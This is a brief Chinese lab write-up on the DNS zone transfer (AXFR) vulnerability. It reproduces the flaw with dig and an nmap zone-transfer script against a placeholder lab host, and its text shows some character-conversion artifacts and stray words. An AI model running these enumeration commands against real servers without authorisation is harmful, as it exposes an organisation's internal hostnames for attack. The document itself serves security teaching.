漏洞原理:
DNS協議支持使用axfr類型的記錄進行區域傳送,用來解決主從同步的問題。若是管理員在配置DNS服務器的時候沒有限制容許獲取記錄的來源,將會致使DNS域傳送漏洞。服務器
漏洞復現:
1.在Linux下,咱們可使用dig命令來發送dns請求。咱們能夠用dig @your-ip www.vulhub.org獲取域名www.vulhub.org 來獲取目標dns服務器上的A記錄。
2.發送axfr類型的dns請求:dig @your-ip -t axfr vulhub.org
可見,我獲取到了vulhub.org的全部子域名記錄,這裏存在DNS域傳送漏洞。
3.咱們也能夠用nmap script來掃描該漏洞:nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 your-ipdom